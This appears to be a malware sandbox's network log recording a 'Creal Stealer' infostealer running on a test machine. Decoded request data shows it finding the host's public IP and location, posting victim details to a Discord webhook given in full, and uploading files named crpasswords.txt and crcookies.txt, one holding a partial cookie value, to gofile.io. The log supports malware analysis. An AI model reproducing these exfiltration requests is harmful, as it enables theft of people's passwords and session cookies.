Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 20:01:58.349503040 CET	1.1.1.1	192.168.2.4	0x47c3	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:01:58.349503040 CET	1.1.1.1	192.168.2.4	0x47c3	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:01:59.753397942 CET	1.1.1.1	192.168.2.4	0x3a50	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 20:01:59.753397942 CET	1.1.1.1	192.168.2.4	0x3a50	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:36.766999960 CET	1.1.1.1	192.168.2.4	0xf915	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:36.766999960 CET	1.1.1.1	192.168.2.4	0xf915	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:36.766999960 CET	1.1.1.1	192.168.2.4	0xf915	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:38.697907925 CET	1.1.1.1	192.168.2.4	0x5352	No error (0)	api.gofile.io		45.112.123.126	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:40.904120922 CET	1.1.1.1	192.168.2.4	0xf5f3	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:43.631263971 CET	1.1.1.1	192.168.2.4	0x8a5e	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:43.631263971 CET	1.1.1.1	192.168.2.4	0x8a5e	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:43.631263971 CET	1.1.1.1	192.168.2.4	0x8a5e	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:43.631263971 CET	1.1.1.1	192.168.2.4	0x8a5e	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:43.631263971 CET	1.1.1.1	192.168.2.4	0x8a5e	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 29, 2024 20:02:43.944029093 CET	1.1.1.1	192.168.2.4	0xb7e3	No error (0)	store4.gofile.io		31.14.70.245	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:38 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.10 Connection: close
2024-12-29 19:02:38 UTC	424	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 19:02:38 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f9c0ba9bc31c439-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1479&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=709&delivery_rate=1940199&cwnd=207&unsent_bytes=0&cid=c3f5dde92c39f38b&ts=470&x=0"
2024-12-29 19:02:38 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:40 UTC	126	OUT	GET /getServer HTTP/1.1 Accept-Encoding: identity Host: api.gofile.io User-Agent: Python-urllib/3.10 Connection: close
2024-12-29 19:02:40 UTC	1113	IN	HTTP/1.1 404 Not Found Server: nginx/1.27.1 Date: Sun, 29 Dec 2024 19:02:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 14 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type, Authorization Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD Access-Control-Allow-Credentials: true Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 0 ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
2024-12-29 19:02:40 UTC	14	IN	Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64 Data Ascii: error-notFound

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:42 UTC	140	OUT	GET /jsonp/8.46.123.189 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.10 Connection: close
2024-12-29 19:02:43 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Sun, 29 Dec 2024 19:02:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-12-29 19:02:43 UTC	172	IN	Data Raw: 61 31 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a1callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.189","state":null})0

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:44 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:02:44 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:02:45 UTC	1265	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:02:45 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498966 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VcL%2BFMVSqvz7tTWlR1tLkLu%2FDQ%2Fl8eYAC5HuxV02pNUQ8POQzbsss%2FBlTVxK8yPGstQWy0EK%2B1aWQIuS%2Bqlz4VQ7lPkN5t9btSJ2CGNxO19%2BPE%2FEgy9Reh12JnEs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=752684ca2b78c199a71dd5c30154bde0dc60dd85-1735498965; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=XhmKbEJ_SuzFm3Iztlh64DXx1CW.ahUwx.jYNEEE048-1735498965245-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0bd46897186d-EWR
2024-12-29 19:02:45 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:45 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 193 Content-Type: multipart/form-data; boundary=------------------------b4d49c28e80b1a5d
2024-12-29 19:02:45 UTC	193	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 34 64 34 39 63 32 38 65 38 30 62 31 61 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 70 61 73 73 77 6f 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 34 64 34 39 63 32 38 65 38 30 62 31 61 35 64 2d 2d 0d 0a Data Ascii: --------------------------b4d49c28e80b1a5dContent-Disposition: form-data; name="file"; filename="crpasswords.txt"Content-Type: text/plain--------------------------b4d49c28e80b1a5d--
2024-12-29 19:02:48 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Sun, 29 Dec 2024 19:02:47 GMT Content-Type: application/json Content-Length: 730 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-29 19:02:48 UTC	730	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 35 34 39 38 39 36 37 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 49 6a 45 4a 68 7a 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 68 77 31 71 77 4a 6a 6d 4d 30 54 75 65 58 52 52 78 4b 74 79 44 64 57 63 55 66 61 64 4b 49 6c 36 22 2c 22 69 64 22 3a 22 65 34 63 65 61 62 39 61 2d 61 32 37 66 2d 34 65 37 63 2d 38 38 63 36 2d 39 64 35 30 61 31 64 37 32 33 36 64 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 35 34 39 38 39 36 37 2c Data Ascii: {"data":{"createTime":1735498967,"downloadPage":"https://gofile.io/d/IjEJhz","guestToken":"hw1qwJjmM0TueXRRxKtyDdWcUfadKIl6","id":"e4ceab9a-a27f-4e7c-88c6-9d50a1d7236d","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1735498967,

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:46 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:02:46 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:02:47 UTC	1253	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:02:47 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498968 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijj83wKKUEjw1eJOyFtwhZNQmOqj9HRXXfRNuSeRihl30er6CwzKyVXN3gHaeFEPnR89HC3x6Irz8Zn73P%2BeUxNVjRqbcmD3FWl1yP561Dv%2BFP8zq6VJ2bbqVGk4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=623e6abcde00c142c2d5ec210b81eac86a32c704-1735498967; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=Cvwb_4N.hYs5dxF6V._pzk.T9yYMRxkEpv5gtFAGey8-1735498967174-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0bdfd983f799-EWR
2024-12-29 19:02:47 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:49 UTC	199	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 3349 Content-Type: multipart/form-data; boundary=------------------------b48fb63f0f8da9d4
2024-12-29 19:02:49 UTC	3349	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 34 38 66 62 36 33 66 30 66 38 64 61 39 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 4e 49 44 09 35 31 31 3d 6a 38 53 51 55 54 6c 74 6e 56 55 35 63 4f 41 65 79 7a 71 53 78 57 2d 71 48 4f 61 6b 52 75 42 48 44 51 47 4c 54 47 65 63 65 43 39 5a 35 72 52 7a 6b 35 74 72 4d 4b 62 34 43 75 5a 43 5f 43 46 6d 63 37 4b 46 Data Ascii: --------------------------b48fb63f0f8da9d4Content-Disposition: form-data; name="file"; filename="crcookies.txt"Content-Type: text/plain.google.comTRUE/FALSE2597573456NID511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KF
2024-12-29 19:02:51 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Sun, 29 Dec 2024 19:02:51 GMT Content-Type: application/json Content-Length: 438 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-29 19:02:51 UTC	438	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 35 34 39 38 39 37 31 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 41 71 37 63 32 6d 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 38 72 52 46 61 74 6d 6d 6c 39 51 62 66 55 4f 44 50 59 72 49 59 63 77 31 62 4b 50 6b 30 4c 4a 44 22 2c 22 69 64 22 3a 22 38 36 34 30 65 64 66 38 2d 32 35 30 65 2d 34 63 32 31 2d 39 32 62 39 2d 38 33 34 37 62 61 32 38 32 65 37 38 22 2c 22 6d 64 35 22 3a 22 38 63 36 66 66 33 34 35 35 31 65 35 64 34 35 61 39 65 36 30 61 30 33 64 33 31 34 38 37 30 35 33 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 74 61 62 2d 73 65 70 61 72 61 74 65 64 2d 76 61 6c 75 65 73 22 2c 22 6d 6f 64 54 69 Data Ascii: {"data":{"createTime":1735498971,"downloadPage":"https://gofile.io/d/Aq7c2m","guestToken":"8rRFatmml9QbfUODPYrIYcw1bKPk0LJD","id":"8640edf8-250e-4c21-92b9-8347ba282e78","md5":"8c6ff34551e5d45a9e60a03d31487053","mimetype":"text/tab-separated-values","modTi

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:50 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:02:50 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:02:51 UTC	1253	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:02:50 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498972 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiMzUe8TVFL4lL3nJ9UjVXgBsR5%2FhFrl8JCe1qpi9sL4DFn9SsFFvwgXF%2FlfIj2gitdZqqwUUw78EBAoy38PWra2dc2OKRq6noTCaiASfhr8hoCrfidyS86FeyUb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=e8824e005ef012f30576e98fe97ec33477a2f423-1735498970; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=VWwslk8gVncU7Dm.2sR8N8v.xq5HXr2aOHWezwSd8xk-1735498970952-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0bf819424363-EWR
2024-12-29 19:02:51 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:52 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:02:52 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:02:52 UTC	1259	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:02:52 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498974 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N0jmu9NXwWZ85CMmIVIoyXjzU6zIVXpkg%2BneiDJBGPJB%2Fwwn%2FYO22vfdTUgeYXwAtwtKA6bwuuaGYXSvimc1zEIhO%2BbVcyYt%2FjNitKXfSRkpECd4zG0TQ8ZfRrkV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=c6eb26ec5d97677dd755fecb35740d7b2c34999d-1735498972; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=oQSdn4_iWAC_tows86fMG9iRoQI2uWlRCf3T1PKS8G4-1735498972732-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0c032acb43d3-EWR
2024-12-29 19:02:52 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:53 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 195 Content-Type: multipart/form-data; boundary=------------------------8e4603062d4623d8
